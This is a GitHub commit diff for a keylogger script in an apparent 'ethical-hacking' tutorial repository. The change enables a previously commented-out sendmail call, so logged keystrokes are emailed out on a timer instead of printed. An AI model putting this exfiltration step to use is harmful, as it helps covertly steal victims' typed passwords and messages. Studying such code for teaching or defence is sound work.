We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent bcc9619 commit 5a53324Copy full SHA for 5a53324
ethical-hacking/keylogger/keylogger.py
@@ -61,8 +61,9 @@ def report(self):
61
"""
62
if self.log:
63
# if there is something in log, report it
64
- # self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log)
65
- print(self.log)
+ self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log)
+ # can print to a file, whatever you want
66
+ # print(self.log)
67
self.log = ""
68
Timer(interval=self.interval, function=self.report).start()
69
0 commit comments